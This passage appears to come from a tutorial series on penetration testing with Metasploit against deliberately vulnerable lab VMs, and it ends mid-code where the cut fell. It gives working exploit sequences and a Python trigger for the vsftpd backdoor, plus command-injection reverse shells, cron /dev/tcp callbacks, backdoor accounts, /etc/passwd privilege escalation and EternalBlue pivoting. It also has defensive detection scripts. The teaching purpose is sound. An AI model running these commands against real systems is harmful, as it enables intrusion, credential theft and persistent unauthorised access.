The Hacker's Path: A 5-Part Series
Part 1: Introduction → Part 2: Flipper Mastery → Part 3: Kali Fundamentals → Part 4: Exploitation → Part 5: The Complete Audit
In Parts 1-3 you built your toolkit. You can clone badges, map networks, capture handshakes, and fingerprint every service running on a target. Now you see weaknesses everywhere. But spotting a vulnerability and exploiting it are two very different skills.
This is where it gets real. Today you will learn the Metasploit Framework, the same tool penetration testers use around the world. You will exploit your first vulnerability, establish persistence, escalate privileges, and learn to pivot through a network.
The Line You Must Not Cross
Everything in this article must be practised on systems you own or have explicit written permission to test. Accessing computer systems without authorisation is a crime; in the US it is a federal offence under the CFAA, with prison sentences of up to 20 years in serious or repeat cases. "I was just learning" is not a defence. Build a lab, use deliberately vulnerable VMs, and never touch systems that are not yours.
Part 1: Building Your Attack Lab
Before you exploit anything you need targets. Real penetration testers use isolated lab environments full of deliberately vulnerable machines. You will do the same.
Essential Lab Setup
What You Will Need
- Kali Linux VM - your attack machine (from Part 3)
- Metasploitable 2 - a deliberately vulnerable Linux VM (SourceForge)
- Metasploitable 3 - vulnerable Windows/Linux VMs (GitHub)
- DVWA - Damn Vulnerable Web Application (GitHub)
- VulnHub VMs - CTF-style vulnerable machines (vulnhub.com)
Project: Lab Network Setup
Time: 45 minutes
- Download Metasploitable 2 from SourceForge
- Import it into VirtualBox/VMware
- Configure networking: put Kali and Metasploitable on the same "Host-Only" or "Internal Network" adapter, never on a bridged one, so the vulnerable VM is unreachable from your LAN and the internet
- Boot Metasploitable (default login: msfadmin/msfadmin)
- Note its IP address: ifconfig
- From Kali, confirm connectivity: ping METASPLOITABLE_IP
- Run an initial scan: sudo nmap -sV -sC METASPLOITABLE_IP
Verification: you should see many open ports. Metasploitable is built to be broken.
Your nmap scan of Metasploitable should show services such as FTP, SSH, Telnet, SMTP, HTTP, Samba, MySQL, PostgreSQL and more, most of them running old, vulnerable versions. This is your practice range.
Part 2: Metasploit Framework Fundamentals
Metasploit is not just a tool. It is an entire ecosystem: thousands of exploits, payloads, auxiliary modules and post-exploitation tools. Understanding how it is organised is essential.
Starting Metasploit
```
# Initialize the database (first time only)
sudo msfdb init

# Start Metasploit console
msfconsole

# You'll see the Metasploit banner and prompt:
msf6 >
```
Metasploit's Structure
Metasploit organises everything into modules:
- Exploits - code that triggers a vulnerability
- Payloads - code that runs after exploitation (shells, Meterpreter)
- Auxiliary - scanners, fuzzers, brute-forcers and other helpers that do not deliver a payload
- Post - post-exploitation modules for gathering, persistence and pivoting
- Encoders - transform payloads to avoid bad characters and naive signature matching (they are not a reliable antivirus bypass on their own)
```
# Search for modules
msf6 > search type:exploit platform:linux smb

# Search by CVE
msf6 > search cve:2017-0144

# Search by name
msf6 > search vsftpd

# Get info about a module
msf6 > info exploit/unix/ftp/vsftpd_234_backdoor
```
Exploitation Workflow
Every exploitation in Metasploit follows the same pattern:
- Choose the exploit: use exploit/path/to/module
- Set options: target IP (RHOSTS), port (RPORT), credentials, whatever show options marks as required
- Choose the payload: what runs after exploitation (set PAYLOAD ...; each module has a sensible default, and show payloads lists the compatible ones)
- Execute: exploit or run
Part 3: Your First Exploit
Let's use one of the most notorious backdoors in history: the vsftpd 2.3.4 backdoor. In 2011 someone planted a backdoor in the vsftpd 2.3.4 source tarball. If you send a username containing the two characters :), a root shell opens on TCP port 6200.
Metasploitable 2 runs exactly this version.
```
# Start Metasploit
msfconsole

# Search for the exploit
msf6 > search vsftpd

# Select the exploit
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor

# View required options
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options

# Set the target
msf6 exploit(...) > set RHOSTS 192.168.56.101

# Run the exploit
msf6 exploit(...) > exploit

# If successful:
[*] Command shell session 1 opened
[+] Got shell!

# You now have a root shell on the target (no prompt is printed: just type a command)
whoami
root
id
uid=0(root) gid=0(root)
```
That's it. One vulnerable service, one exploit, root access. This is why keeping software up to date matters. The backdoor shell shows no prompt, so type a command and press Enter before concluding that the session is dead.
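To see what the module actually does on the wire, here is the trigger sequence replayed against a local mock. This is an added example written for this article, not Metasploit's code. The mock server is constructed to imitate the trojaned daemon (a ":)" in USER arms a shell listener while the login itself still fails) so that the whole exchange runs offline on loopback. The real backdoor listens on TCP 6200; the mock picks a free port, and its "uid=0(root)" reply is constructed to match what Metasploitable 2 returns, since its vsftpd runs as root.

```python
# The vsftpd 2.3.4 backdoor trigger, replayed against a local mock of the trojaned server.
# Added example for this article (not Metasploit code). MockVsftpd234 is a constructed
# stand-in; trigger_vsftpd_backdoor is what the exploit module does, step by step.
import socket
import threading
import time

SMILEY = b":)"             # the two bytes (0x3a 0x29) the trojaned code looked for in the username
REAL_BACKDOOR_PORT = 6200  # where the real backdoor listens; the mock uses a free port instead


def recv_line(sock):
    """Read up to and including '\\n' (returns b'' if the peer closed first)."""
    data = b""
    while not data.endswith(b"\n"):
        chunk = sock.recv(1)
        if not chunk:
            break
        data += chunk
    return data


def trigger_vsftpd_backdoor(host, ftp_port=21, backdoor_port=REAL_BACKDOOR_PORT,
                            command=b"id", timeout=5.0):
    """Log in with ':)' in the username, then connect to the shell that appears on
    backdoor_port and run one command. Mirrors exploit/unix/ftp/vsftpd_234_backdoor."""
    with socket.create_connection((host, ftp_port), timeout=timeout) as ftp:
        banner = recv_line(ftp)
        if not banner.startswith(b"220"):
            raise RuntimeError("not an FTP service: %r" % banner)
        ftp.sendall(b"USER x" + SMILEY + b"\r\n")
        recv_line(ftp)                     # 331 Please specify the password.
        ftp.sendall(b"PASS x\r\n")         # the login still fails; the listener is already armed
    deadline = time.monotonic() + timeout  # the listener takes a moment, so retry like the module
    while True:
        try:
            shell = socket.create_connection((host, backdoor_port), timeout=timeout)
            break
        except OSError:
            if time.monotonic() > deadline:
                raise
            time.sleep(0.1)
    with shell:                            # a bare /bin/sh: no banner, no prompt
        shell.sendall(command + b"\n")
        return recv_line(shell).decode(errors="replace").strip()


class MockVsftpd234:
    """Constructed stand-in for the trojaned daemon (not vsftpd's code). Serves a minimal FTP
    dialogue on 127.0.0.1 and, once USER contains ':)', starts accepting on the backdoor port."""

    def __init__(self):
        self.ftp = socket.socket()
        self.ftp.bind(("127.0.0.1", 0))
        self.ftp.listen(1)
        self.ftp_port = self.ftp.getsockname()[1]
        self.backdoor = socket.socket()    # bound but NOT listening: refused until triggered
        self.backdoor.bind(("127.0.0.1", 0))
        self.backdoor_port = self.backdoor.getsockname()[1]
        self.triggered = False
        threading.Thread(target=self._serve_ftp, daemon=True).start()

    def _serve_ftp(self):
        conn, _ = self.ftp.accept()
        with conn:
            try:
                conn.sendall(b"220 (vsFTPd 2.3.4)\r\n")
                while True:
                    line = recv_line(conn)
                    if not line:
                        return
                    verb = line.split(b" ", 1)[0].upper()
                    if verb == b"USER":
                        if SMILEY in line and not self.triggered:
                            self.triggered = True
                            self.backdoor.listen(1)
                            threading.Thread(target=self._serve_shell, daemon=True).start()
                        conn.sendall(b"331 Please specify the password.\r\n")
                    elif verb == b"PASS":
                        conn.sendall(b"530 Login incorrect.\r\n")
                    else:
                        conn.sendall(b"500 Unknown command.\r\n")
            except OSError:
                return                     # client went away; nothing else to do

    def _serve_shell(self):
        conn, _ = self.backdoor.accept()
        with conn:
            cmd = recv_line(conn).strip()
            # constructed reply: on Metasploitable 2 the daemon runs as root, so the shell does too
            if cmd == b"id":
                conn.sendall(b"uid=0(root) gid=0(root) groups=0(root)\n")
            else:
                conn.sendall(b"sh: " + cmd + b": not found\n")


if __name__ == "__main__":
    srv = MockVsftpd234()
    print(trigger_vsftpd_backdoor("127.0.0.1", srv.ftp_port, srv.backdoor_port))
```

Run it directly to watch the same dialogue the Metasploit module drives. Pointed at a lab box with the default ports, trigger_vsftpd_backdoor doubles as a one-shot check for a service that only a version banner suggested was backdoored.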
Project: Exploiting the vsftpd Backdoor
Time: 15 minutes
Prerequisites: Metasploitable 2 running, Kali on the same network
- Confirm FTP is running: nmap -sV -p 21 TARGET_IP
- Start msfconsole
- Search for, select, and configure the vsftpd exploit
- Run the exploit
- Once you have a shell, look around: cat /etc/shadow
Success criteria: you can read /etc/shadow, which only root can access.
Part 4: Understanding Payloads
A payload is what runs after an exploit succeeds. The basic shell we got above is simple, but Metasploit offers far more capable options.
Payload Types
- Singles - self-contained, single-purpose payloads (add a user, run a command)
- Stagers - small payloads that set up the connection and then pull down the main payload
- Stages - the main payload delivered by the stager (Meterpreter)
```
# List compatible payloads for current exploit
msf6 exploit(...) > show payloads

# Set a specific payload
msf6 exploit(...) > set PAYLOAD linux/x86/meterpreter/reverse_tcp

# Payload naming convention:
# platform/arch/payload_type/connection_type
# linux/x86/meterpreter/reverse_tcp
# windows/x64/shell/bind_tcp
```
In the staged names above the stager and stage are separated by a slash (meterpreter/reverse_tcp); a single payload writes them as one word (shell_reverse_tcp). Compatibility is per exploit: the vsftpd backdoor only offers cmd/unix/interact, because the shell already exists on port 6200 and nothing is injected into a process.
Reverse vs Bind Shells
- Reverse shell - the target connects back to you. Best for getting through firewalls (outbound traffic is usually allowed).
- Bind shell - the target opens a listening port for you to connect to. Easier to spot and often blocked by inbound firewall rules.
```
# For reverse shells, you must set your IP
msf6 exploit(...) > set LHOST YOUR_KALI_IP
msf6 exploit(...) > set LPORT 4444

# Metasploit starts a listener automatically when you exploit
```
Meterpreter: The Best Payload
Meterpreter is Metasploit's most capable payload. It is designed to run entirely in memory (nothing is written to disk), its command channel is encrypted, and it includes dozens of built-in post-exploitation commands.
```
# Meterpreter commands (once you have a session)
meterpreter > sysinfo        # System information
meterpreter > getuid         # Current user
meterpreter > pwd            # Current directory
meterpreter > ls             # List files
meterpreter > download file  # Download file to Kali
meterpreter > upload file    # Upload file to target
meterpreter > shell          # Drop to system shell
meterpreter > hashdump       # Dump password hashes (Windows; on Linux use: run post/linux/gather/hashdump)
meterpreter > screenshot     # Take screenshot (Windows desktop sessions)
meterpreter > keyscan_start  # Start keylogger (Windows)
meterpreter > keyscan_dump   # Dump keystrokes
meterpreter > background     # Background this session
```
Part 5: More Exploitation Techniques
Exploiting Samba (SMB)
Metasploitable 2 runs a vulnerable Samba 3.0.x. The bug (CVE-2007-2447) is a command injection: when the non-default username map script option is configured, as it is on Metasploitable 2, Samba hands the username to a shell without sanitising it, so a crafted username runs arbitrary commands as root. It is unrelated to EternalBlue, the Windows SMBv1 memory-corruption bug behind WannaCry, beyond both living on the SMB ports.
```
# Search for Samba exploits
msf6 > search type:exploit samba

# The "username map script" vulnerability
msf6 > use exploit/multi/samba/usermap_script
msf6 exploit(...) > set RHOSTS TARGET_IP
msf6 exploit(...) > set PAYLOAD cmd/unix/reverse
msf6 exploit(...) > set LHOST YOUR_IP
msf6 exploit(...) > exploit

[*] Command shell session 2 opened
```
Exploiting Weak Credentials
Not every breach needs a software vulnerability. Weak passwords are everywhere.
```
# SSH brute-force auxiliary module
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(...) > set RHOSTS TARGET_IP
msf6 auxiliary(...) > set USERNAME root
# rockyou ships compressed on Kali: run "sudo gunzip /usr/share/wordlists/rockyou.txt.gz" once.
# It has ~14 million lines; at SSH speeds that is days, so use a short, targeted list in practice.
msf6 auxiliary(...) > set PASS_FILE /usr/share/wordlists/rockyou.txt
msf6 auxiliary(...) > set STOP_ON_SUCCESS true
msf6 auxiliary(...) > run

# For known credentials
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(...) > set USERNAME msfadmin
msf6 auxiliary(...) > set PASSWORD msfadmin
msf6 auxiliary(...) > run

[+] 192.168.56.101:22 - Success: 'msfadmin:msfadmin'
```
Web Application Exploitation
Metasploitable includes several vulnerable web applications. Let's use OS command injection: an input field whose value is pasted into a shell command.
```
# First, browse to http://TARGET/mutillidae/
# Mutillidae's "User Info" page is vulnerable to SQL injection; its "DNS Lookup" page hands
# the input to a shell (command injection). DVWA's "Command Execution" page works the same way.

# Use Metasploit's web exploits
msf6 > search type:exploit php

# Or exploit manually with command injection.
# On Kali, start a listener first:
nc -lvnp 4444
# In the vulnerable input field:
; cat /etc/passwd
; nc -e /bin/bash YOUR_IP 4444
```
Project: Exploiting Three Different Services
Time: 60 minutes
Target: Metasploitable 2
- Exploit the vsftpd backdoor (FTP - port 21) and get a root shell
- Exploit Samba usermap_script (SMB - ports 139/445) and get a root shell
- Crack SSH credentials (port 22) with auxiliary/scanner/ssh/ssh_login
- Document each exploitation: module used, options set, result
Bonus: explore the web applications on port 80 and find manual exploitation paths.
Part 6: Post-Exploitation
Getting a shell is only the beginning. A real penetration test has to show what an attacker could do with that access. That is post-exploitation.
Information Gathering
```
# From a Meterpreter session
meterpreter > sysinfo
Computer : metasploitable
OS : Linux 2.6.24
Architecture: i686
Meterpreter : x86/linux

# Network information
meterpreter > ipconfig
meterpreter > route
meterpreter > arp
```
```
# From a regular shell
cat /etc/passwd   # All users
cat /etc/shadow   # Password hashes (requires root)
cat /etc/hosts    # Network mappings
netstat -tulpn    # Open ports
ps aux            # Running processes
crontab -l        # Scheduled tasks
```
Credential Harvesting
```
# Dump password hashes
meterpreter > hashdump                        # Windows Meterpreter (priv extension)
meterpreter > run post/linux/gather/hashdump  # Linux sessions: reads /etc/shadow and unshadows it
root:$1$XtqVHIvN$0MnR7..........:0:0:root:/root:/bin/bash
msfadmin:$1$XN10Zj2c$Rt/zzC........:1000:1000::/home/msfadmin:/bin/bash
```
```
# Or from shell
cat /etc/shadow

# Crack hashes offline with John the Ripper
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
```
With a GPU, hashcat is faster: hashcat -m 500 hashes.txt /usr/share/wordlists/rockyou.txt, where -m 500 selects md5crypt, the $1$ format these hashes use. Pick the mode from the hash prefix; hashcat rejects input that does not match the selected mode.
Establishing Persistence
Persistence means keeping access after a reboot, or after the vulnerability you came in through has been patched.
```
# Add a new user with sudo access
useradd -m -s /bin/bash hacker
echo "hacker:password123" | chpasswd
usermod -aG sudo hacker

# Add SSH key for passwordless access
mkdir -p /home/hacker/.ssh
echo "YOUR_PUBLIC_KEY" >> /home/hacker/.ssh/authorized_keys
# sshd (StrictModes) refuses keys in a directory owned by root or writable by others:
chown -R hacker:hacker /home/hacker/.ssh
chmod 700 /home/hacker/.ssh && chmod 600 /home/hacker/.ssh/authorized_keys

# Cron-based reverse shell (reconnects every minute)
echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'" >> /var/spool/cron/crontabs/root
# cron may not notice a spool file edited behind its back; installing via crontab is reliable:
(crontab -l 2>/dev/null; echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'") | crontab -

# Metasploit persistence modules (the old "run persistence" script was Windows-only and has been removed;
# its replacement there is post/windows/manage/persistence_exe)
meterpreter > background
msf6 > use exploit/linux/local/cron_persistence
msf6 exploit(...) > set SESSION 1
msf6 exploit(...) > set LHOST YOUR_IP
msf6 exploit(...) > exploit
```
Persistence = Evidence
Every persistence method leaves traces. On a real penetration test you document what you were able to do, then you clean up. Leaving backdoors on client systems is unprofessional and may be illegal. In your lab, try everything, but understand the consequences.
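Every step in the persistence block above leaves a fingerprint a defender can look for: a uid-0 account that is not root, a hash sitting in /etc/passwd, a cron entry that opens /dev/tcp, a key nobody approved, a new member of the sudo group. The checker below is an added example for this article, not code from the page or from any tool. Its inputs are constructed snippets, and the baselines (known keys, expected sudoers) are assumptions a real deployment would take from a golden image or configuration management.

```python
# Spot the traces the persistence steps above leave behind.
# Added example for this article; all inputs below are constructed samples.
import re

# command fragments typical of a callback shell or a download-and-run stager
CALLBACK = re.compile(r"/dev/tcp/|\b(nc|ncat|netcat)\b[^|;]*\s-e\s|bash -i|mkfifo|socat\s[^|;]*exec", re.I)
REMOTE_FETCH = re.compile(r"\b(curl|wget)\b[^|;]*https?://", re.I)


def suspicious_passwd(passwd_text):
    """uid-0 accounts other than root, hashes stored directly in /etc/passwd, shared UIDs."""
    findings, by_uid = [], {}
    for line in passwd_text.splitlines():
        f = line.split(":")
        if len(f) != 7:
            continue
        user, pw, uid = f[0], f[1], int(f[2])
        if uid == 0 and user != "root":
            findings.append(f"uid 0 account '{user}' with shell {f[6]}")
        if pw not in ("x", "*", "!", ""):
            findings.append(f"password hash in /etc/passwd for '{user}'")
        by_uid.setdefault(uid, []).append(user)
    for uid, users in by_uid.items():
        if uid != 0 and len(users) > 1:            # uid 0 duplicates are already reported above
            findings.append(f"uid {uid} shared by {', '.join(users)}")
    return findings


def suspicious_cron(crontab_text):
    """Entries (user-crontab format) whose command phones home or pulls code from the network."""
    findings = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue                               # blank, comment or VAR=value line
        if line.startswith("@"):                   # @reboot, @hourly, ...
            cmd = line.split(None, 1)[1] if " " in line else ""
        else:
            parts = line.split(None, 5)            # five time fields, then the command
            cmd = parts[5] if len(parts) == 6 else ""
        if CALLBACK.search(cmd):
            findings.append(f"callback in cron: {cmd}")
        elif REMOTE_FETCH.search(cmd):
            findings.append(f"cron fetches remote content: {cmd}")
    return findings


def unexpected_keys(authorized_keys_text, known_keys):
    """Keys outside the approved set. Options such as command="..." may precede the key type."""
    findings = []
    for line in authorized_keys_text.splitlines():
        parts = line.split()
        for i, tok in enumerate(parts):
            if tok.startswith(("ssh-", "ecdsa-", "sk-")) and i + 1 < len(parts):
                key = f"{tok} {parts[i + 1]}"
                comment = " ".join(parts[i + 2:]) or "(no comment)"
                if key not in known_keys:
                    findings.append(f"unknown ssh key: {comment}")
                break
    return findings


def sudo_group_changes(group_text, expected_members):
    """Members of sudo/wheel/admin that are not in the expected set."""
    findings = []
    for line in group_text.splitlines():
        f = line.split(":")
        if len(f) == 4 and f[0] in ("sudo", "wheel", "admin"):
            for m in sorted(set(filter(None, f[3].split(","))) - set(expected_members)):
                findings.append(f"'{m}' added to group {f[0]}")
    return findings


def audit(passwd, crontab, keys, group, known_keys, expected_sudoers):
    return (suspicious_passwd(passwd) + suspicious_cron(crontab)
            + unexpected_keys(keys, known_keys) + sudo_group_changes(group, expected_sudoers))


# constructed samples: what the box might look like after the persistence steps above
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
hacker:x:1001:1001::/home/hacker:/bin/bash
sysadm:$1$xyz$constructedhashvalue0000:0:0:root:/root:/bin/bash
"""
SAMPLE_CRONTAB = """\
SHELL=/bin/bash
# m h dom mon dow command
0 3 * * * /usr/bin/apt-get update
* * * * * /bin/bash -c 'bash -i >& /dev/tcp/10.0.0.99/4444 0>&1'
@reboot curl -s http://10.0.0.99/s.sh | sh
"""
SAMPLE_KEYS = """\
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIConstructedAdminKey0000000000000000000 admin@workstation
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDConstructedAttackerKey00000000000000 kali
"""
SAMPLE_GROUP = "sudo:x:27:msfadmin,hacker\n"
KNOWN_KEYS = {"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIConstructedAdminKey0000000000000000000"}
EXPECTED_SUDOERS = {"msfadmin"}

if __name__ == "__main__":
    for finding in audit(SAMPLE_PASSWD, SAMPLE_CRONTAB, SAMPLE_KEYS, SAMPLE_GROUP, KNOWN_KEYS, EXPECTED_SUDOERS):
        print("[!]", finding)
```

The same checks, run against the real files on a host, are what a defender compares against a known-good baseline; the hash-in-/etc/passwd test also catches the artifact that privesc path #3 in the next section leaves behind.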
Part 7: Privilege Escalation
Often your initial access is as a low-privilege user. Escalating to root or admin is usually required to reach the objectives of the test.
Privilege Escalation on Linux
```
# Current user context
id
whoami

# SUID binaries (run as owner regardless of who executes)
find / -perm -4000 -type f 2>/dev/null

# Directories writable by the current user
find / -writable -type d 2>/dev/null

# Sudo permissions
sudo -l

# Kernel version (for kernel exploits)
uname -a

# Running processes as root
ps aux | grep root

# Cron jobs
cat /etc/crontab
ls -la /etc/cron.*
```
Automated Enumeration Scripts
- LinPEAS - github.com/carlospolop/PEASS-ng
- LinEnum - github.com/rebootuser/LinEnum
- linux-exploit-suggester - GitHub
```
# Upload and run LinPEAS
# From Kali, host the script:
python3 -m http.server 8000

# From target:
wget http://YOUR_IP:8000/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

# LinPEAS highlights potential vectors in colors:
# RED/YELLOW = Critical findings, likely exploitable
```
Common Linux Privesc Paths
```
# 1. Sudo misconfiguration
sudo -l
# If you see: (ALL) NOPASSWD: /usr/bin/vim
sudo vim -c '!sh'
# Instant root shell

# 2. SUID binary exploitation
# If /usr/bin/find has the SUID bit:
find . -exec /bin/sh -p \;

# 3. Writable /etc/passwd
# Generate a password hash:
openssl passwd -1 mypassword
# Append a uid-0 user with that hash in the password field:
echo 'hacker:$1$xyz$...:0:0:root:/root:/bin/bash' >> /etc/passwd
su hacker

# 4. Cron job exploitation
# If a cron job runs a script you can write to as root:
echo 'chmod +s /bin/bash' >> /path/to/cron/script
# Wait for cron, then:
/bin/bash -p
# Root shell
```
Privilege Escalation on Windows
If you are testing Windows targets (Metasploitable 3), the techniques differ:
```
# From Meterpreter on Windows
meterpreter > getuid
Server username: VICTIM\lowpriv_user

# getsystem needs an already-privileged context (local admin or SeImpersonatePrivilege);
# from a plain user it fails and you need a local exploit first
meterpreter > getsystem
[+] ...got SYSTEM

# If getsystem fails, try:
meterpreter > run post/multi/recon/local_exploit_suggester

# Or background and use a specific exploit:
meterpreter > background
msf6 > use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
msf6 exploit(...) > set SESSION 1
msf6 exploit(...) > exploit
```
Project: Escalating from User to Root
Time: 45 minutes
Scenario: you have SSH access to Metasploitable as msfadmin (not root)
- SSH to Metasploitable: ssh msfadmin@TARGET
- Run id to confirm you are not root
- Check sudo permissions: sudo -l
- Look for SUID binaries: find / -perm -4000 2>/dev/null
- Upload and run LinPEAS
- Identify a privesc path and use it
Goal: get a root shell by some means other than exploiting a network service.
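LinPEAS does this at scale, but the reasoning behind its colours is worth doing once by hand. The script below is an added example for this article, not LinPEAS or GTFOBins code: it parses the "(runas) TAGS: commands" lines of sudo -l, matches SUID binaries against a short list of documented shell escapes, and checks which scripts a root cron job runs that anyone can overwrite (the precondition for path #4 above). The sudo -l output and the SUID list are constructed samples that do not describe the real Metasploitable 2; the cron check builds two throwaway scripts in a temporary directory.

```python
# Triage privesc enumeration output into concrete candidates.
# Added example for this article; the sudo -l text and SUID list are constructed samples.
import os
import re
import stat
import tempfile

# binaries with a documented shell escape when run via sudo or with the SUID bit (abbreviated list)
SHELL_ESCAPES = {
    "vim": "vim -c ':!/bin/sh'",
    "vi": "vi -c ':!/bin/sh'",
    "find": "find . -exec /bin/sh -p \\; -quit",
    "less": "less /etc/profile, then type !/bin/sh",
    "more": "more /etc/profile, then type !/bin/sh",
    "nmap": "nmap --interactive, then !sh (nmap <= 5.21 only)",
    "python": "python -c 'import os; os.execl(\"/bin/sh\", \"sh\", \"-p\")'",
    "perl": "perl -e 'exec \"/bin/sh\";'",
    "awk": "awk 'BEGIN {system(\"/bin/sh\")}'",
    "env": "env /bin/sh -p",
    "bash": "bash -p",
}
# SUID by design on most distributions; only interesting if the version is known-vulnerable
EXPECTED_SUID = {"passwd", "sudo", "su", "ping", "mount", "umount", "chsh", "chfn", "newgrp", "gpasswd"}
SUDO_LINE = re.compile(r"^\s*\(([^)]*)\)\s*((?:[A-Z_]+:\s*)*)(.+)$")


def sudo_findings(sudo_l_output):
    """Parse the '(runas) TAGS: cmd, cmd' lines of sudo -l. Returns (command, note) tuples."""
    findings = []
    for line in sudo_l_output.splitlines():
        m = SUDO_LINE.match(line)
        if not m:
            continue
        tags, cmds = m.group(2), m.group(3)
        nopasswd = "NOPASSWD" in tags
        for cmd in (c.strip() for c in cmds.split(",")):
            if cmd == "ALL":
                findings.append(("ALL", "full sudo: sudo -i" + (" (no password)" if nopasswd else "")))
                continue
            name = os.path.basename(cmd.split()[0])
            if name in SHELL_ESCAPES:
                findings.append((cmd, ("NOPASSWD " if nopasswd else "") + "sudo " + SHELL_ESCAPES[name]))
            else:
                findings.append((cmd, "not in escape list: review manually"))
    return findings


def suid_findings(suid_paths):
    """SUID binaries that are not SUID by design and have a known escape."""
    return [(p, SHELL_ESCAPES[os.path.basename(p)])
            for p in suid_paths
            if os.path.basename(p) not in EXPECTED_SUID and os.path.basename(p) in SHELL_ESCAPES]


def writable_cron_targets(system_crontab_text):
    """For /etc/crontab-style lines (five time fields, user, command) that run as root,
    return the scripts anyone can overwrite."""
    hits = []
    for line in system_crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        parts = line.split(None, 6)
        if len(parts) != 7 or parts[5] != "root":
            continue
        target = parts[6].split()[0]
        try:
            mode = os.stat(target).st_mode
        except OSError:
            continue                          # script missing: a different (PATH hijack) story
        if mode & stat.S_IWOTH:
            hits.append((target, "world-writable, runs as root"))
    return hits


def demo_cron_check():
    """Builds two throwaway scripts (one world-writable) and a constructed /etc/crontab using them."""
    d = tempfile.mkdtemp()
    good, bad = os.path.join(d, "backup.sh"), os.path.join(d, "cleanup.sh")
    for p in (good, bad):
        with open(p, "w") as fh:
            fh.write("#!/bin/sh\n")
    os.chmod(good, 0o755)
    os.chmod(bad, 0o777)
    crontab = f"""SHELL=/bin/sh
# m h dom mon dow user  command
17 *  * * * root {good} --quiet
*/5 * * * * root {bad}
0  2  * * * msfadmin {bad}
"""
    return [(os.path.basename(t), why) for t, why in writable_cron_targets(crontab)]


SAMPLE_SUDO_L = """\
Matching Defaults entries for msfadmin on metasploitable:
    env_reset, env_keep+=LD_LIBRARY_PATH

User msfadmin may run the following commands on metasploitable:
    (root) NOPASSWD: /usr/bin/vim, /usr/bin/less
    (ALL) /usr/sbin/tcpdump
"""
SAMPLE_SUID = ["/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/nmap", "/usr/bin/find", "/bin/su", "/bin/ping"]

if __name__ == "__main__":
    for path, note in sudo_findings(SAMPLE_SUDO_L) + suid_findings(SAMPLE_SUID) + demo_cron_check():
        print(f"{path:24} {note}")
```

Paste the real sudo -l and find output into these functions on a lab box; anything reported as "review manually" is where GTFOBins and the binary's own man page come in.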
Part 8: Pivoting
Pivoting is using a compromised system to attack other systems that are not directly reachable from your attack machine. This is how attackers move laterally through networks.
The Pivot Scenario
Imagine this network:
- Your Kali box: 192.168.1.100
- Compromised host: 192.168.1.50 (also connected to the internal network 10.0.0.0/24)
- Target: 10.0.0.10 (reachable only from 192.168.1.50)
You cannot reach 10.0.0.10 directly. Through the compromised host, you can.
Metasploit Routing
```
# After getting a Meterpreter session on the pivot host
meterpreter > ipconfig
# Shows two interfaces: 192.168.1.50 and 10.0.0.50

# Legacy script form; current Metasploit prefers: run post/multi/manage/autoroute SUBNET=10.0.0.0/24
meterpreter > run autoroute -s 10.0.0.0/24
[+] Added route to 10.0.0.0/24 via session 1

meterpreter > background

# Now Metasploit routes 10.0.0.0/24 traffic through session 1
msf6 > route print

# Scan the internal network
msf6 > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(...) > set RHOSTS 10.0.0.1-254
msf6 auxiliary(...) > set PORTS 22,80,443,445
msf6 auxiliary(...) > run

# Exploit internal targets through the pivot
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(...) > set RHOSTS 10.0.0.10
msf6 exploit(...) > exploit
```
One catch: the route only carries traffic that Metasploit itself originates. A reverse_tcp payload on 10.0.0.10 would try to reach your Kali address, which the internal host cannot route to, so use a bind payload (for example windows/x64/meterpreter/bind_tcp) or point the reverse payload at a port you have forwarded on the pivot with portfwd.
SOCKS Proxy for Full Access
```
# Set up a SOCKS proxy that uses Metasploit's routing table
msf6 > use auxiliary/server/socks_proxy
msf6 auxiliary(...) > set SRVPORT 1080
msf6 auxiliary(...) > run

# Configure proxychains (/etc/proxychains4.conf)
socks5 127.0.0.1 1080

# Now any tool can access the internal network
proxychains nmap -sT -Pn 10.0.0.10
proxychains curl http://10.0.0.10
```
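Both auxiliary/server/socks_proxy and ssh -D speak the same protocol to the tools behind them: SOCKS5, RFC 1928. Knowing the few bytes involved explains why nmap needs -sT -Pn and why hostnames should be resolved by the proxy rather than locally. The codec below is an added example for this article, not proxychains, OpenSSH or Metasploit code; the byte strings it is checked against are constructed, and socks5_connect expects a socket you have already connected to the proxy (127.0.0.1:1080 in the setup above).

```python
# SOCKS5 (RFC 1928) as spoken between proxychains and a proxy such as auxiliary/server/socks_proxy or ssh -D.
# Added example for this article; sample bytes are constructed.
import ipaddress
import struct

VER, NO_AUTH, NO_ACCEPTABLE = 0x05, 0x00, 0xFF
CMD_CONNECT = 0x01
ATYP_IPV4, ATYP_DOMAIN, ATYP_IPV6 = 0x01, 0x03, 0x04
REPLIES = {0: "succeeded", 1: "general SOCKS server failure", 2: "connection not allowed by ruleset",
           3: "network unreachable", 4: "host unreachable", 5: "connection refused",
           6: "TTL expired", 7: "command not supported", 8: "address type not supported"}


def client_greeting(methods=(NO_AUTH,)):
    """VER | NMETHODS | METHODS: the client lists the auth methods it accepts."""
    return bytes([VER, len(methods), *methods])


def parse_method_selection(data):
    """VER | METHOD: the proxy picks one method, or 0xFF to refuse."""
    ver, method = struct.unpack("!BB", data[:2])
    if ver != VER:
        raise ValueError(f"not SOCKS5 (version byte {ver})")
    if method == NO_ACCEPTABLE:
        raise ConnectionError("proxy accepts none of the offered auth methods")
    return method


def _encode_addr(host):
    try:
        ip = ipaddress.ip_address(host)
        return bytes([ATYP_IPV4 if ip.version == 4 else ATYP_IPV6]) + ip.packed
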